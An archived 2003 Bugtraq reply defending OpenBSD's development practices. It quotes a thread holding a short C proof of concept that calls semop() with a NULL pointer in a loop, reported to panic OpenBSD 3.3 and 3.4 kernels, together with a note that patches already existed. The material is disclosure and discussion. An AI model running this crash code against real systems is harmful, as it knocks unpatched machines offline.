lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 24 Nov 2003 18:29:02 +0000
From: Coleman Kane <cokane@...ane.org>
To: bugtraq@...urityfocus.com
Subject: Re: yet another panic() in OpenBSD

I think alot of people are missing the point of OpenBSD. They only focus
on removing security related (privilege escalation, and so forth) flaws
from their software. That's what ProPolice and W^X and all the other stuff
is about. It is a project lacking a lot of good developers who are instead
focused on Linux or Free/NetBSD. Many of it's contributions make it back up
into the trees of the more mainstream projects, OpenSSH/SSL, crypto devices,
pf, and more.

I really don't get the consistent OpenBSD bashing that goes on here. They do
a lot of good work, and if you keep noticing a lack of 'basic QA and unit
testing' and other flaws you should try to contribute. The reason they lack
many of these ameneties that other projects have is that they are a much
smaller organization.

On Sat, Nov 22, 2003 at 11:39:23PM +0100, Henning Brauer wrote, and it was proclaimed:
> On Fri, Nov 21, 2003 at 05:46:01PM -0500, noir@...rhax0r.net wrote:
> > a project lacking the basic QA and unit testing and here is the outcome:
> > 
> > #include <stdio.h>
> > #include <sys/types.h>
> > #include <sys/sem.h>
> > #include <sys/ipc.h>
> > 
> > int
> > main()
> > {
> >     int i;
> > 
> >         for(i = 0; i < 0x40; i++)
> >                 semop(i, (struct sembuf *) NULL, 0);
> > 
> > }
> > 
> > 
> > PANIC in OpenBSD 3.3 and 3.4 is confirmed.
> 
> please note that patch 008 for OpenBSD 3.4 / 013 for OpenBSD 3.3 fixes 
> that issue.
> This patch was out _before_ the above post.
> 
> It's not really hard to look at the patch and post to fd and bugtraq
> afterwards...
> 
> -- 
> Henning Brauer, BS Web Services, http://bsws.de
> hb@...s.de - henning@...nbsd.org
> Unix is very simple, but it takes a genius to understand the simplicity.
> (Dennis Ritchie)

Content of type "application/pgp-signature" skipped

Powered by blists - more mailing lists